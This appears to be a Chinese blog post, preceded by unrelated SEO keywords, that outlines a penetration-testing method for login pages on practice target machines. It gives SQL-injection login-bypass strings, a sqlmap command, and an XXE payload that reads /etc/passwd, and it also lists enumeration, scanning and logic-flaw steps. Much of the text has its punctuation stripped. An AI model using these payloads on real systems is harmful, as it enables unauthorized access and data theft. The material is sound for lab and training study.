潍坊奎文住房和城乡建设局网站,ui网页设计教程,做网站还是小程序,wordpress百科0x00 前言
最近遇到几个靶机都是登录框#xff0c;简单写下我的渗透思路吧~~
0x01 渗透思路
1、用户名枚举爆破
用户名的查找#xff0c;像工号可以尝试通过互联网搜索引擎去收集
爆破#xff1a;burp字典
2、万能密码
测试方法#xff1a;
(1)用户名输入#xff…0x00 前言
最近遇到几个靶机都是登录框简单写下我的渗透思路吧~~
0x01 渗透思路
1、用户名枚举爆破
用户名的查找像工号可以尝试通过互联网搜索引擎去收集
爆破burp字典
2、万能密码
测试方法
(1)用户名输入‘ or 11 or ‘ 密码任意
(2)Admin’ - -或‘ or 11 or ‘ - -(admin or 11 —) (MS SQL)(直接输入用户名不进行密码验证)
(3)用户名输入admin 密码输入’ or ‘1’’1 也可以
(4) 用户名输入admin’ or ‘a’‘a 密码输入任意
(5) 用户名输入‘ or 11 - -
(6) 用户名输入admin‘ or 11 - - 密码输入任意
(7) 用户名输入1’or’1’‘1’or’1’’1 密码输入任意
3、sql注入
工具测试方法抓取请求包用sqlmap扫
sqlmap -u ip --data usernameadminpasswordadmin --thread 10 --batch --dbs4、XXE
抓包查看账号密码是否以xml文件传输。
?xml version1.0 encodingUTF-8?!DOCTYPE Quan[!ENTITY admin SYSTEM file:///etc/passwd]
rootnameadmin;/namepasswordadmin/password/root以及针对目录扫描、端口扫描等方式收集的信息的利用方法
5、目录扫描 目录遍历 敏感文件 egweb.config.bak、www.rar、robots.txt
根据文件内容进行对应利用尝试、代码审计。
6、端口扫描
端口扫描得知使用了某个中间件、服务等查找其相关漏洞。 常见危险端口服务 google搜索端口 查询相关漏洞poc
searchsploit
https://www.exploit-db.com/7、未授权访问/越权
分析扫描、js文件中泄露的接口去尝试利用
工具JSFinder、supersearch等
eg/admin/admin.aspx
8、框架漏洞
根据页面报错/icon信息或者端口扫描得知使用了某个中间件、框架、服务等查找其相关漏洞。如tp、swagger、struts2、shiro。
常见框架报错页面常见危险端口服务
9、逻辑漏洞
1任意用户注册
如尝试访问register.php等
2任意密码重置
3短信验证码绕过
